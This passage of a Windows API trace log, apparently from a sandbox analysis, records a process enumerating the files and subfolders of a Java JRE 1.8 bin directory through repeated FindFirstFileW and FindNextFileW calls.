ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6840, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr.dll", cAlternateFileName="")) returned 1 [0179.391] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x22240, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfxmedia.dll", cAlternateFileName="")) returned 1 [0179.392] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7511d3f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7511d3f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2794a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfxwebkit.dll", cAlternateFileName="JFXWEB~1.DLL")) returned 1 [0179.392] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jjs.exe", cAlternateFileName="")) returned 1 [0179.392] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2aa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jli.dll", cAlternateFileName="")) returned 1 [0179.392] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa897bfc2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x48440, dwReserved0=0x0, dwReserved1=0x0, cFileName="jp2iexp.dll", cAlternateFileName="")) returned 1 [0179.392] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa897bfc2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa897bfc2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1b640, dwReserved0=0x0, dwReserved1=0x0, cFileName="jp2launcher.exe", cAlternateFileName="JP2LAU~1.EXE")) returned 1 [0179.392] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jp2native.dll", cAlternateFileName="JP2NAT~1.DLL")) returned 1 [0179.393] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39840, dwReserved0=0x0, dwReserved1=0x0, cFileName="jp2ssv.dll", cAlternateFileName="")) returned 1 [0179.393] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpeg.dll", cAlternateFileName="")) returned 1 [0179.393] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4840, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsdt.dll", cAlternateFileName="")) returned 1 [0179.393] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsound.dll", cAlternateFileName="")) returned 1 [0179.393] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsoundds.dll", cAlternateFileName="")) returned 1 [0179.393] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x35e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="kcms.dll", cAlternateFileName="")) returned 1 [0179.394] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="keytool.exe", cAlternateFileName="")) returned 1 [0179.394] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="kinit.exe", cAlternateFileName="")) returned 1 [0179.394] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="klist.exe", cAlternateFileName="")) returned 1 [0179.394] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="ktab.exe", cAlternateFileName="")) returned 1 [0179.394] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39040, dwReserved0=0x0, dwReserved1=0x0, cFileName="lcms.dll", cAlternateFileName="")) returned 1 [0179.394] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9040, dwReserved0=0x0, dwReserved1=0x0, cFileName="management.dll", cAlternateFileName="MANAGE~1.DLL")) returned 1 [0179.394] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x9fa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlib_image.dll", cAlternateFileName="MLIB_I~1.DLL")) returned 1 [0179.395] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa12a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0179.395] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr100.dll", cAlternateFileName="")) returned 1 [0179.395] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0179.395] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="net.dll", cAlternateFileName="")) returned 1 [0179.395] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xec40, dwReserved0=0x0, dwReserved1=0x0, cFileName="nio.dll", cAlternateFileName="")) returned 1 [0179.395] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="npt.dll", cAlternateFileName="")) returned 1 [0179.396] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="orbd.exe", cAlternateFileName="")) returned 1 [0179.396] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="pack200.exe", cAlternateFileName="")) returned 1 [0179.396] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="plugin2", cAlternateFileName="")) returned 1 [0179.396] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.396] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2bd8 [0179.396] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2a2bf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.396] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xca750, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msvcr100.dll", cAlternateFileName="")) returned 1 [0179.396] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="npjp2.dll", cAlternateFileName="")) returned 1 [0179.397] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39440, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="npjp2.dll", cAlternateFileName="")) returned 0 [0179.397] FindClose (in: hFindFile=0x43a2bd8 | out: hFindFile=0x43a2bd8) returned 1 [0179.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.397] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0179.397] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe040, dwReserved0=0x0, dwReserved1=0x0, cFileName="prism_common.dll", cAlternateFileName="PRISM_~1.DLL")) returned 1 [0179.397] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1fe40, dwReserved0=0x0, dwReserved1=0x0, cFileName="prism_d3d.dll", cAlternateFileName="PRISM_~2.DLL")) returned 1 [0179.397] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="prism_sw.dll", cAlternateFileName="")) returned 1 [0179.397] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.dll", cAlternateFileName="")) returned 1 [0179.398] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8a148fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmid.exe", cAlternateFileName="")) returned 1 [0179.398] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8a148fe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8a148fe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8af971e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmiregistry.exe", cAlternateFileName="RMIREG~1.EXE")) returned 1 [0179.398] FindNextFileW (in: hFindFile=0x43a28d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xab35b530, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="server", cAlternateFileName="")) returned 1 [0179.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.398] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xab35b530, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a3018 [0179.398] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xab35b530, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.398] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x21, ftCreationTime.dwLowDateTime=0xab35b530, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xab35b530, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xabaa88bc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11d0000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="classes.jsa", cAlternateFileName="")) returned 1 [0179.398] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b1f9e6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b1f9e6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b1f9e6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x866c40, dwReserved0=0x0, 